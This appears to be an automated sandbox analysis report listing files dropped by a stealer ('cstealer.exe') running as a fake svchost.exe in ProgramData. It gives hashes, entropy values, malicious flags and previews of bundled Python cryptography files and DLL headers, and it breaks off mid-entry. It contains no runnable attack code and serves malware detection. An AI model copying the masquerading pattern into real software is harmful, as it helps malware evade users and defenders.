                                                                                                                                                          Size (bytes):4
                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:pip.
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):197
                                                                                                                                                          Entropy (8bit):4.61968998873571
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                          MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                          SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                          SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                          SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11360
                                                                                                                                                          Entropy (8bit):4.426756947907149
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                          MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                          SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                          SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                          SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                          Malicious:false
Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
Process:C:\ProgramData\svchost.exe
File Type:ASCII text
Category:dropped
Size (bytes):1532
Entropy (8bit):5.058591167088024
Encrypted:false
SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
Malicious:false
Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
Process:C:\ProgramData\svchost.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5430
Entropy (8bit):5.111831778200942
Encrypted:false
SSDEEP:96:DxZpqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:xJnkoBs/stL18cT+vIrrxsM6VwDjyeyM
MD5:AD313397AABF8AF5D234DF73C901CB4D
SHA1:B213A420B73EACF37409BC428812B3E17F1C12C9
SHA-256:65479522961A5B9B1C4811232C4133DDC8BDA9BBBC7562B81EF76857A2A2475A
SHA-512:468BD32AABA49839D4A4752108A378954900037588B7095B318179D64F76F4302ADEBCFA1664CEE5CC390AD0EEA79A611A7B5C372548FEA22DF77C2A459DA2AF
Malicious:false
Preview:Metadata-Version: 2.1..Name: cryptography..Version: 42.0.5..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst
Process:C:\ProgramData\svchost.exe
File Type:CSV text
Category:dropped
Size (bytes):15325
Entropy (8bit):5.566095103726107
Encrypted:false
SSDEEP:192:GXPJofR5jF4e+6tkh4v4Ko29vZ6W1HepPN+NXwvn5ZnM:GXOfbCWPoIvZ6W1HepPN+9wvnA
MD5:63C3E2671FC695972FAC7F7FA26CA3DB
SHA1:58A52CA7E0B6F9DE0E89E1DA799EBBD7898D635E
SHA-256:A443A65BFFDE342F60CA1267DAB2229514073F64AB1BCC08CCCEF42FC015C16D
SHA-512:4773FC277B176EDC3872D654992B53BF247B8E3ED87D40C43A5ACEB593C88E03EB6E0E200145EEB66C3B0ACDBA4B77107279C2681840405E88AD195976779D87
Malicious:false
Preview:cryptography-42.0.5.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.5.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.5.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.5.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.5.dist-info/METADATA,sha256=ZUeVIpYaW5scSBEjLEEz3ci9qbu8dWK4HvdoV6KiR1o,5430..cryptography-42.0.5.dist-info/RECORD,,..cryptography-42.0.5.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-42.0.5.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.5.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=Q_dIPaB2u54kbfNQMzqmbel-gbG6RC5vWzO6OSFDGqM,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/_
Process:C:\ProgramData\svchost.exe
File Type:ASCII text
Category:dropped
Size (bytes):100
Entropy (8bit):5.0203365408149025
Encrypted:false
SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
MD5:C48772FF6F9F408D7160FE9537E150E0
SHA1:79D4978B413F7051C3721164812885381DE2FDF5
SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
Malicious:false
Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..
Process:C:\ProgramData\svchost.exe
File Type:ASCII text
Category:dropped
Size (bytes):13
Entropy (8bit):3.2389012566026314
Encrypted:false
SSDEEP:3:cOv:Nv
MD5:E7274BD06FF93210298E7117D11EA631
SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
Malicious:false
Preview:cryptography.
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):7218176
Entropy (8bit):6.56234593155449
Encrypted:false
SSDEEP:98304:1CPfKk+AGdmA+xiIfIBE7S2ohqc/3J2y:gPfr3GdmAwjABE7S2ogiJ
MD5:12A7C0D35CCBD002150BB29DDD7E8440
SHA1:F16D9A4654DC76B3CFADA387FF7BDDDB0B18B79A
SHA-256:7E22D579AC503B959268964102C03D4E96C8A9B74186158B8C82FDC8CF9D9522
SHA-512:C9E5E68DE8F51F91CBBA839B4FECE1DB4DA7480890A6C7318A78DEAA30191FCB8913BA447F45D4AE93B986F3246F09F8CC721E781CE020110A3BB5628B3EF9F7
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.Fs..Fs..Fs..O...Ts.....Ds.....Ws.....Ns.....Bs..|...Ds..Fs..gq.....Ws..)...0p.....Gs..Fs...s.....Gs.....Gs..RichFs..........................PE..d....A.e.........." ...'.jS...........R.......................................n...........`.........................................`.h.p.....h.|............Pj..M............m......7c.T....................8c.(....6c.@.............S..............................text....hS......jS................. ..`.rdata........S......nS.............@..@.data....!... i.......i.............@....pdata...M...Pj..N....i.............@..@.reloc........m......Dm.............@..B................................................................................................................................................................................................................................................................
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3450648
Entropy (8bit):6.098075450035195
Encrypted:false
SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:9D7A0C99256C50AFD5B0560BA2548930
SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):32792
Entropy (8bit):6.3566777719925565
Encrypted:false
SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
MD5:EEF7981412BE8EA459064D3090F4B3AA
SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):704792
Entropy (8bit):5.5573527806738126
Encrypted:false
SSDEEP:12288:WhO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0TGqwfU2lvz2:2is/POtrzbLp5dQ0TGqcU2lvz2
MD5:BEC0F86F9DA765E2A02C9237259A7898
SHA1:3CAA604C3FFF88E71F489977E4293A488FB5671C
SHA-256:D74CE01319AE6F54483A19375524AA39D9F5FD91F06CF7DF238CA25E043130FD
SHA-512:FFBC4E5FFDB49704E7AA6D74533E5AF76BBE5DB297713D8E59BD296143FE5F145FBB616B343EED3C48ECEACCCCC2431630470D8975A4A17C37EAFCC12EDD19F4
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".D...T......<................................................i....`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................................
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):348672
Entropy (8bit):6.620074456825018
Encrypted:false
SSDEEP:6144:PS8ZHilzJNijWKvNpwNasFp2HX5l5XBMC+ZSHUV50DErV4c+:PSEilzJNijfpOSjDz
MD5:9D1B8BAD0E17E63B9D8E441CDC15BAEE
SHA1:0C5A62135B072D1951A9D6806B9EFF7AA9C897A3
SHA-256:D733C23C6A4B21625A4FF07F6562BA882BCBDB0F50826269419D8DE0574F88CD
SHA-512:49E7F6AB825D5047421641ED4618FF6CB2A8D22A8A4AE1BD8F2DEEFE7987D80C8E0ACC72B950D02214F7B41DC4A42DF73A7F5742EBC96670D1C5A28C47B97355
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................a.........................................................................r.............Rich............PE..d......a.........." .........@......P.....................................................`.............................................P............p.......P..(...............|...@...............................`...8............0...............................text...H........................... ..`.rdata.......0......................@..@.data....8.......2..................@....pdata..(....P.......,..............@..@.rsrc........p.......J..............@..@.reloc..|............L..............@..B........................................................................................................................................................................................................................................
Process:C:\ProgramData\svchost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):198936
Entropy (8bit):6.372446720663998
Encrypted:false
SSDEEP:3072:13BAJzkk5dT6F62eqf2A3zVnjIHdAPKReewMP12yGUfT0+SYyWgOmrpjAxvwnVIq:FQg4dT6N5OA3zVnjNed4yGKTKR/
MD5:1118C1329F82CE9072D908CBD87E197C
SHA1:C59382178FE695C2C5576DCA47C96B6DE4BBCFFD
SHA-256:4A2D59993BCE76790C6D923AF81BF404F8E2CB73552E320113663B14CF78748C
SHA-512:29F1B74E96A95B0B777EF00448DA8BD0844E2F1D8248788A284EC868AE098C774A694D234A00BD991B2D22C2372C34F762CDBD9EC523234861E39C0CA752DCAA
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...sn.Jsn.Jsn.Jz.:J.n.J!..Kqn.J!..K.n.J!..K{n.J!..Kpn.J...Kqn.J8..Kpn.Jsn.J.n.J...Kwn.J...Krn.J..VJrn.J...Krn.JRichsn.J................PE..d.....,d.........." ......................................................................`.........................................p...P................................/...........4..T...........................05..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):66328
                                                                                                                                                          Entropy (8bit):6.162953246481027
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:t68LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqn:t6wewnvtjnsfwxVILL0S7SyuPxHO
                                                                                                                                                          MD5:FD4A39E7C1F7F07CF635145A2AF0DC3A
                                                                                                                                                          SHA1:05292BA14ACC978BB195818499A294028AB644BD
                                                                                                                                                          SHA-256:DC909EB798A23BA8EE9F8E3F307D97755BC0D2DC0CB342CEDAE81FBBAD32A8A9
                                                                                                                                                          SHA-512:37D3218BC767C44E8197555D3FA18D5AAD43A536CFE24AC17BF8A3084FB70BD4763CCFD16D2DF405538B657F720871E0CD312DFEB7F592F3AAC34D9D00D5A643
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.d.A.d.A.d...l.@.d...d.@.d.....@.d...f.@.d.RichA.d.........PE..d.....,d.........." .................................................................x....`.........................................`...`................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4458776
                                                                                                                                                          Entropy (8bit):6.460390021076921
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                                                                                                          MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                                                                                                          SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                                                                                                          SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                                                                                                          SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29976
                                                                                                                                                          Entropy (8bit):6.627859470728624
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                                                                                                          MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                                                                                                          SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                                                                                                          SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                                                                                                          SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1016584
                                                                                                                                                          Entropy (8bit):6.669319438805479
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                          MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                          SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                          SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                          SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1123608
                                                                                                                                                          Entropy (8bit):5.3853088605790385
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                                                                                                          MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                                                                                                          SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                                                                                                          SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                                                                                                          SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):36352
                                                                                                                                                          Entropy (8bit):5.307092802083391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:frtPrRtr4IXhjSwZQ41tsSWEJwrhmf6mvgkoOIB/5k7jKWboNeMCKAODeNaoL5I1:f5br54WmB/aENyKAODhSoLkCpIk
                                                                                                                                                          MD5:7E65EFC6C3B12A403A110056141FF14E
                                                                                                                                                          SHA1:144845210FE97AF7D8570713BAE944CCBBD9BF16
                                                                                                                                                          SHA-256:8267AC2A59BA26CDAF4B347A8C92D26ACB1E261AFFFFE1D160F9153372363A64
                                                                                                                                                          SHA-512:3B37C27825CA85BF96E28BB2F7545A29BA595E19E8D78C9C1912CBC4EB7349CC3F9B52A466D0E7FB537E646AB2BB1F704D2B59389ABEA5F4C2733DA74F3A3380
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..^W..^W..^W..W/M.\W..K(..\W.../..\W..K(..UW..K(..VW..K(..]W.."..]W..^W...W..g..._W..g..._W..g.!._W..g..._W..Rich^W..........................PE..d....yLe.........." ...%.H...H.......M....................................................`..........................................r..d...tr..d...................................`k.............................. j..@............`...............................text....G.......H.................. ..`.rdata...!...`..."...L..............@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83328
                                                                                                                                                          Entropy (8bit):6.532254531979707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                          MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                          SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
